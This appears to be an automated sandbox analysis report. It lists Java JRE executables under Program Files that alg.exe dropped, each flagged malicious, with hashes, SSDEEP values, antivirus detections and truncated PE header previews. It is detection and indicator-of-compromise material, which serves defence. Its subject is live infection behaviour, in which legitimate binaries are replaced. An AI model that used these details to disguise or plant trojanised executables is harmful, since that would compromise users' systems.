                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:713E954B8604235473F207D5CD22E5A6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4C6A4A9D084467690EE7B8FE8590C492D630F62A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D68A9031B3440A499BA087A6D01A91F9922D67F6215F2773089EE7E0D6AE65B8
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:966723674D07AD7EA274DA6C46451D29604E08482A735B2BFE549A786DF09D59D05FEA3C7632BBF2EFEB1772C098973F18E217A265364B0EB3A1DC2D6723B3BB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032423854230272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:HKxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DACD85148BF0423D101DF2DB08DC73D2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F4310CB10627FEA456361B786446F78773CD7580
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:639E49676B67EBA67201D2F177F6BE44F0529E252231324319AE6404E2A4D59A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FD82E465BA4CD1A27175BE22F35BA68E74E215F5BC3092EA43CE9398DB5F57119B5397DDBB533D94B30E13647DCDED20BA0390AED39056EFBE19F0BE4F45611C
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................!........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446075210874543
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:fnEbH0j4x7R6SvyCM4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:fkwOtO74sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F448F77DE620340C08AE0B74F1EEFA24
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5A968C478AF4991B1F136D99464390014CB2A0EB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0EBBC75CB1F7C828D397DE59B6795704E469DEDF3E18C71055BE8FE197FD3C3B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7FBD5BD9BBD9EFFFD08BB0FE9E454F4C8C35C3E34BC80152B059E26A8804C83041E01093F09718B4CC6322EB5DF9E2B268F5D728A9CC1B9B0AE2DF198110A036
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.11974182238755
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:rv1vvlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:r1FsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AAC5269B0BED8221C423A975B4235C65
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E44CB50E61BBB9CB7865D5889DA524861F424F7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:15F9F5B53895E850E8E0377703B037EDF946CBF6F0D6A7BA1B38808720553629
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F796CF213AC841D5972059AA1B4CD3C6BFAC8532C8EDA9F0CD4D6E2B59ACDC26C2C6EA127DA6B74593CC041665C648346E6B7293F6E4A3869B44AE2EDC9F930F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446829820868321
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:wnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:wU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BC9573A7357A9E1E8F800533794F27E4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4CD89A3A57F8EB44F428DC8F7F1C7D5B4054EA49
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:70A9BAA0B2D31D8F990F24BD6898CD2E1BC136CD077F571BC27FB8EDF9E84738
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1194C52DF21FBD0DCD413E8769B5293FCC09E76312F477FAE6AEDCA05BF1A1261469830CD9A92C8DE3E68E75131A888B3010E6830B1A08794BF51F07E8570CFB
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......,h.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.483751915520233
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:rx71iBLZ05jNTmJWExUsqjnhMgeiCl7G0nehbGZpbD:rxhiHIjNgwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:053FC02ADBF5409EBE516CAB40DE2201
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:57FC373059BA616B203D15E5B6E25B5BDCF61FF9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:191C259DC679263D386A0CC3B37B6F6CABD529EAAE1FD3AEDA9F209829BB658C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D9C7D5CECC0FC0ABA8B6E758DDAF55761F9D3334B648602C018DE8373BC3DA0AA60C2C771AAD71DFE35DBB570D8CCFB9A8CD4B8BC3502DFB2D57AB7D7ECB6B94
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................;..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032903659663857
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:V3rhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5B34BD41F5A424E4DD9EB3AA4B33A8C2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB4B652952BC6EAECBC0FAFBC7913FBF60D35368
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:003B70E9B758CC3788D0D762C58C1F7076B5061EC6E9F6A3684C1BC469B998E0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D00104087C4A2DC4E08A296C8CAA66B33A7A7D8FDDFDBAD308D59FAF2AB7975D6437DB7267D860ADD2225A706F41BA63C234BE03913B41F94554C04F34658E1
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................n.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242112
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.172677759678602
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:wYdP/KXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1dP/KsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2A4A19F13F8E2A9D5306D8119E4B9EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9B5DE5D1F2F787252120461C8BEF8F265503C3EE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C04DBF0387364E364FA5D3137B2480906ED78C81278FEDB5F15E92F90386DFD2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5C9841A5BF2D0D66E60A6256412564CD8E3DDD30CDD4ACD2F2FA26F2E79CD044531F063A02CCF44AD551725673BEAC8ACE28DD00729BC8156CCAA9E554BF66E7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P.......Q..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032925263231839
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:1y5ZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:wPsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE72B24CCDC948484ABCE55A913BD896
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DC2B173534CB513F334A61172C547EEC1B171FF9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4AC03D6BBD9126CA10C24F606D74A3284005CA73D2BAAC16D710A8B68DDD45B9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F50F9954BBD7111DC4DFFFA2F5B28CEC84517F4254ED0D3AA286316E896A8D826CEA135DA7BF84BF29AC7B2BE06DF28E0A5200169871BEA511F72959F5CD0698
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................m1.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.03299240210311
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SKlxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0E6F707522DC8983BDDE1F36824E0A82
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9D092C114C66723AB308045AA978EA2D5C0CBB24
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E159924650D927EFBB37EF93F26420D0D42953316A8061D195F8ADA749687A47
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5EF75729A6372A4E90FD3FF09E0FD998C86DFDC07D12C761F7009CEDCE8418F81A3F462E6009592A9A9C1377326D5842CE5099E0ACD92DBD265C49F374259474
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032994520004987
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:4ilxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5TsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:64074A801315A9F99A18187755EC6BCA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:94A12E897BEA6666A0B6F4E40932156B1006170C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:36D198F59D609A6AD48BD4EAD96E4DAA9B4D9669905042CE34D7F1CA0F63FA51
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BDBC576F48CBE48AB8AD56EF9E165B25A9B9AB75AAC4AEEF31EAA0DB40E50DF9DA05159518C82F6AA1AE86E6F79F3571487793E514931D70AD6C8DB55C45F7C4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................02.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032960810946111
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:KTmRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cMsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6098E1B6188572223822B75529C026B1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FDCBD0EB461F4651D6B6A9D02F2B72E522C2FF24
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D6207EDA9A542638BD6E9E92E4631DE579773EAA2A1EC895A59A7DFE0117E30C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5F15F2F5DDE44223512C11516FE2FDACAA78E30976CA52D7C69AE467FAB5F70D2F6CDF0DE321B717A2E28588E1E8D07CDB53259B6465112490F92C1F3DF4D8F9
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................m[.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.033883171852505
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:+amlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B174288CD579ED9FE2094757EC30C286
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4591AF9E53402768F3334FC420D518E8204941A7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:40676B87E4A649F3B0E5B0F2443276CF83DD964260D5CB298A282B61F579BD9B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF60CCDEA24B15E1F19FB3A904C870642985AC1BAF48DDDBF21AC5E02A83EEB80D6753FE1E465C374466A644D6441C7C2C12FC551EDFEF93664CAF9A21ABCDC7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.032949741820989
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:gQ5ZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:v3sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:117C87C5D569535FAB8BE25DEFA35252
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:374D5F979F88740528A8412A70F3F18D3E74D67C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F89A62A66DCDABF8552226545B059629F04D078B697953D04256440C2EFE5C14
